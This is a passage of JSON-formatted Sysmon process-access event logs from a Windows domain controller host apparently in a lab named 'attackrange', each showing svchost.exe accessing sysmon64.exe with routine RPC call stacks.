08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
